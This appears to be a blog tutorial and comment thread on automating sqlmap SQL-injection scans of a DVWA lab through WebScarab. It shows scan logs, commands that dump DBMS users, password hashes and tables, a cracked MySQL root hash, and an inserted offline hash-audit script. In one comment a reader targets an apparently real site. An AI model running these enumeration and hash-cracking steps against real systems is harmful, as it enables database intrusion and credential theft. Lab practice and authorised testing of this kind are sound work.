[52:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:32] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:32] [INFO] testing 'Oracle AND time-based blind'
[52:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:33] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[52:34] [WARNING] GET parameter 'password_new' is not injectable
[52:34] [INFO] testing if GET parameter 'password_conf' is dynamic
[52:34] [WARNING] GET parameter 'password_conf' appears to be not dynamic
[52:34] [WARNING] heuristic test shows that GET parameter 'password_conf' might not be injectable
[52:34] [INFO] testing sql injection on GET parameter 'password_conf'
[52:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:35] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:35] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:35] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:36] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:36] [INFO] testing 'Oracle AND time-based blind'
[52:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:38] [WARNING] GET parameter 'password_conf' is not injectable
[52:38] [INFO] testing if GET parameter 'Change' is dynamic
[52:38] [WARNING] GET parameter 'Change' appears to be not dynamic
[52:38] [WARNING] heuristic test shows that GET parameter 'Change' might not be injectable
[52:38] [INFO] testing sql injection on GET parameter 'Change'
[52:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:39] [INFO] testing 'Oracle AND time-based blind'
[52:39] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:41] [WARNING] GET parameter 'Change' is not injectable
[52:41] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:41] [INFO] skipping 'http://192.168.6.65:80/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change'
[52:41] [INFO] url 11:
GET http://192.168.6.65:80/dvwa/vulnerabilities/fi/?page=include.php
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:41] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/fi/?page=include.php
[52:41] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:41] [INFO] testing connection to the target url
[52:41] [INFO] testing if the url is stable, wait a few seconds
[52:42] [INFO] url is stable
[52:42] [INFO] testing if GET parameter 'page' is dynamic
[52:42] [INFO] confirming that GET parameter 'page' is dynamic
[52:42] [INFO] GET parameter 'page' is dynamic
[52:43] [WARNING] heuristic test shows that GET parameter 'page' might not be injectable
[52:43] [INFO] testing sql injection on GET parameter 'page'
[52:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:43] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:43] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:43] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:44] [INFO] testing 'Oracle AND time-based blind'
[52:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[52:46] [WARNING] GET parameter 'page' is not injectable
[52:46] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:46] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/pentest/database/sqlmap/output/results-08102012_0452pm.csv'

[*] shutting down at: 52:46

root@bt:/pentest/database/sqlmap#

————————————————————–

/pentest/web/webscarab

root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab1111.tmp/conversations

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab0087.tmp/conversations --users --passwords --tables --dbs --level=2 --risk=1 --scope=^IP-Address$

[02:35:19] [WARNING] no clear password(s) found
database management system users password hashes:

[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

Note: you can look the hash up on online decrypter sites.

MySQL 4.1 uses SHA1 for password hashes (the leading * marks this hash format).

http://www.md5decrypter.co.uk/sha1-decrypt.aspx

263027ecc84aa7b81ea86b0ebecafe20bc8804fc = dojo
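The hash sqlmap printed above (and again in the author's reply in the comments) is in the MySQL 4.1+ format, which is SHA1 applied twice, not a single SHA1 of the password. Here is an added Python example, not from the original page, WebScarab or sqlmap, that reproduces that format, parses the `password hash:` lines of sqlmap's `--passwords` output, and audits each hash offline against a constructed list of weak passwords, so a dumped hash never has to be handed to a third-party site. The sample output block and the candidate list are constructed; the `mypass` reference vector in the comments is the one given in the MySQL reference manual.

```python
import hashlib
import re
from typing import Dict, List, Optional

# Constructed sample: the hash block sqlmap --passwords printed for the MySQL root
# account in the article above, laid out as the page shows it.
SQLMAP_OUTPUT = """\
database management system users password hashes:

[*] root [1]:
    password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
"""

# Constructed audit list: passwords an auditor would flag on any DBMS account.
WEAK_CANDIDATES = ["root", "password", "toor", "mysql", "admin", "dojo"]

def mysql41_hash(password: str) -> str:
    """MySQL 4.1+ (mysql_native_password): '*' + uppercase hex of SHA1(SHA1(pw))."""
    # The inner digest is fed to the outer SHA1 as raw bytes, so a one-round SHA1
    # lookup of the hex string is not the computation the server performs.
    # Reference vector from the MySQL manual: PASSWORD('mypass') gives
    # *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

def parse_sqlmap_hashes(text: str) -> Dict[str, List[str]]:
    """Collect the hashes listed under each '[*] user [n]:' header."""
    hashes: Dict[str, List[str]] = {}
    user: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        header = re.match(r"\[\*\] (\S+) \[\d+\]:$", line)
        if header:
            user = header.group(1)
            hashes.setdefault(user, [])
            continue
        entry = re.match(r"password hash: (\*[0-9A-Fa-f]{40})$", line)
        if entry and user is not None:
            hashes[user].append(entry.group(1).upper())
    return hashes

def audit_hash(stored: str, candidates: List[str]) -> Optional[str]:
    """Return the candidate that reproduces `stored`, or None if none does."""
    stored = stored.upper()
    for candidate in candidates:
        if mysql41_hash(candidate) == stored:
            return candidate
    return None

def audit_sqlmap_output(text: str, candidates: List[str]) -> Dict[str, Optional[str]]:
    """For every account sqlmap listed: the matching weak password, or None."""
    report: Dict[str, Optional[str]] = {}
    for user, stored_hashes in parse_sqlmap_hashes(text).items():
        report[user] = None
        for stored in stored_hashes:
            match = audit_hash(stored, candidates)
            if match is not None:
                report[user] = match
                break
    return report

if __name__ == "__main__":
    for user, match in audit_sqlmap_output(SQLMAP_OUTPUT, WEAK_CANDIDATES).items():
        print(user, "->", repr(match) if match else "no match in candidate list")
```

Running the script reports, for each account in the sample block, whether any listed candidate reproduces its hash; extend WEAK_CANDIDATES with your own policy list to audit a real dump.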

[02:35:19] [INFO] fetching database names
[02:35:19] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[02:35:19] [INFO] fetching tables for databases: w3af_test, dvwa, information_schema, mysql
Database: w3af_test
[2 tables]
+-----------+
| customers |
| users     |
+-----------+

Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[02:35:20] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.
  -b, --banner          Retrieve DBMS banner
  --current-user        Retrieve DBMS current user
  --current-db          Retrieve DBMS current database
  --is-dba              Detect if the DBMS current user is DBA
  --users               Enumerate DBMS users
  --passwords           Enumerate DBMS users password hashes
  --privileges          Enumerate DBMS users privileges
  --roles               Enumerate DBMS users roles
  --dbs                 Enumerate DBMS databases
  --tables              Enumerate DBMS database tables
  --columns             Enumerate DBMS database table columns
  --dump                Dump DBMS database table entries
  --dump-all            Dump all DBMS databases tables entries
  --search              Search column(s), table(s) and/or database name(s)
  -D DB                 DBMS database to enumerate
  -T TBL                DBMS database table to enumerate
  -C COL                DBMS database table column to enumerate
  -U USER               DBMS user to enumerate
  --exclude-sysdbs      Exclude DBMS system databases when enumerating tables
  --start=LIMITSTART    First query output entry to retrieve
  --stop=LIMITSTOP      Last query output entry to retrieve
  --first=FIRSTCHAR     First query output word character to retrieve
  --last=LASTCHAR       Last query output word character to retrieve
  --sql-query=QUERY     SQL statement to be executed
  --sql-shell           Prompt for an interactive SQL shell

4 thoughts on “web application – webscarab”

  1. Hi !
    I’m practicing sqlmap SQL injection and there is a very serious problem :c
    These are the steps that are performed :
    1. Capturing a cookie on Live HTTP Headers
    img : http://i49.tinypic.com/2cqla8w.png

    2. wrote the following in sqlmap :
    C:\sqlmap> sqlmap.py -u URL-replaced --cookie='PHPSESSID=2795f86459d52a77a344fa5dfc3e72c6;' --string='Surname' --dbs --level 3 -p id

    This is the result:
    Code:
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

    [*] starting at: 10:53:40

    [10:53:40] [WARNING] the testable parameter 'id' you provided is not into the Cookie
    [10:53:40] [INFO] using 'C:\sqlmap\output\URL-replaced\session' as session file
    [10:53:40] [INFO] testing connection to the target url
    [10:53:48] [INFO] testing if the provided string is within the target URL page content
    [10:53:51] [WARNING] you provided ''First' as the string to match, but such a string is not within the target URL page content original request, sqlmap will keep going anyway
    you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y
    [10:53:57] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
    [10:53:57] [INFO] testing sql injection on GET parameter 'id'
    [10:53:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [10:55:10] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
    [10:56:28] [INFO] testing 'Generic boolean-based blind - Parameter replace'
    [10:56:29] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
    [10:56:30] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
    [10:56:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
    [10:56:32] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
    [10:56:33] [INFO] testing 'Oracle boolean-based blind - Parameter replace (original value)'
    [10:56:34] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace (original value)'
    [10:56:35] [INFO] testing 'SAP MaxDB boolean-based blind - Parameter replace (original value)'
    [10:56:36] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
    [10:56:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
    [10:56:44] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
    [10:56:48] [INFO] testing 'Oracle boolean-based blind - GROUP BY and ORDER BY clauses'
    [10:56:52] [INFO] testing 'Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses'
    [10:56:56] [INFO] testing 'MySQL stacked conditional-error blind queries'
    [10:58:15] [INFO] testing 'PostgreSQL stacked conditional-error blind queries'
    [10:58:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'
    [11:00:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
    [11:01:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
    [11:01:53] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
    [11:02:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
    [11:03:24] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
    [11:04:14] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)'
    [11:04:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)'
    [11:05:38] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
    [11:06:22] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
    [11:07:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
    [11:07:05] [INFO] testing 'PostgreSQL error-based - Parameter replace'
    [11:07:06] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
    [11:07:08] [INFO] testing 'Oracle error-based - Parameter replace'
    [11:07:09] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
    [11:07:15] [INFO] testing 'PostgreSQL error-based - GROUP BY and ORDER BY clauses'
    [11:07:20] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
    [11:07:27] [INFO] testing 'Oracle error-based - GROUP BY and ORDER BY clauses'
    [11:07:36] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [11:09:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
    [11:11:08] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
    [11:12:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
    [11:13:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
    [11:14:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
    [11:15:38] [INFO] testing 'Oracle AND time-based blind'
    [11:16:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
    [11:25:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
    [11:33:35] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
    [11:41:31] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
    [11:49:10] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
    [11:58:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
    [11:58:34] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
    [12:06:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
    [12:06:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
    [12:13:42] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
    [12:13:42] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
    [12:21:23] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
    [12:21:23] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
    [12:31:52] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
    [12:31:52] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
    [12:43:06] [WARNING] GET parameter 'id' is not injectable
    [12:43:06] [CRITICAL] all parameters are not injectable, try to increase --level/--risk values to perform more tests. Rerun without providing the --technique switch. Give it a go with the --text-only switch if the target page has a low percentage of textual content (~9.17% of page content is text)

    [*] shutting down at: 12:43:06

    C:\sqlmap>sqlmap.py -u http://URL-replaced/plan.php?id=379 --cookie='PHPSESSID=2795f86459d52a77a344fa5dfc3e72c6;' --string='Surname' --dbs --level 3 -p id

    [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
    -----
    [12:43:06] [CRITICAL] all parameters are not injectable, try to increase --level/--risk values to perform more tests. Rerun without providing the --technique switch. Give it a go with the --text-only switch if the target page has a low percentage of textual content (~9.17% of page content is text).

    :C It may be an exploitable vulnerability, or am I doing something wrong? Can someone please help me.

    1. Can't help here. Will advise only to use sqlmap in a lab environment or while performing a pre-approved pen test.

      Personally I like to automate sqlmap. This is how.

      backtrack 5r1

      1. Open webscarab web proxy.

      /pentest/web/webscarab

      root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar

      Surf a site and wait till it shows an injection point. (You can see this under the tabs and Tree Selection filters. You should see URL / Methods / Status / Possible Injection. This is the area you're interested in.)

      Once you get a few ticks (normally, keep surfing the site till you see 2 - 5 ticks under Possible Injection; note you may get some more from spidering the site),
      then close webscarab.

      2. Look in your /tmp folder for the latest webscarab0087.tmp file. (Note: I use the GUI for this, so I can right-click and copy the name and location of the file.)

      3. Then change directory to /pentest/database/sqlmap

      Look at the switches below, and how you present the location of /tmp/webscarab0087.tmp/conversations (the webscarab possible injection point log) to sqlmap. Note: change --scope=^IP-Address$ to the IP address or URL of the site being tested, or you will attack all agreed sites in the /tmp/webscarab0087.tmp/conversations file.

      root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab0087.tmp/conversations --users --passwords --tables --dbs --level=2 --risk=1 --scope=^IP-Address$

      [02:35:19] [WARNING] no clear password(s) found
      database management system users password hashes:

      [*] root [1]:
      password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

      Note: you can use online decrypter sites.

      MySQL 4.1 uses SHA1.

      http://www.md5decrypter.co.uk/sha1-decrypt.aspx

      263027ecc84aa7b81ea86b0ebecafe20bc8804fc = dojo

      [02:35:19] [INFO] fetching database names
      [02:35:19] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, dvwa, mysql, w3af_test
      available databases [4]:
      [*] dvwa
      [*] information_schema
      [*] mysql
      [*] w3af_test

      [02:35:19] [INFO] fetching tables for databases: w3af_test, dvwa, information_schema, mysql
      Database: w3af_test
      [2 tables]
      +-----------+
      | customers |
      | users     |
      +-----------+

      Database: dvwa
      [2 tables]
      +-----------+
      | guestbook |
      | users     |
      +-----------+

      [02:35:20] [INFO] fetching columns for table 'users' on database 'dvwa'
      Database: dvwa
      Table: users
      [6 columns]
      +------------+-------------+
      | Column     | Type        |
      +------------+-------------+
      | avatar     | varchar(70) |
      | first_name | varchar(15) |
      | last_name  | varchar(15) |
      | password   | varchar(32) |
      | user       | varchar(15) |
      | user_id    | int(6)      |
      +------------+-------------+
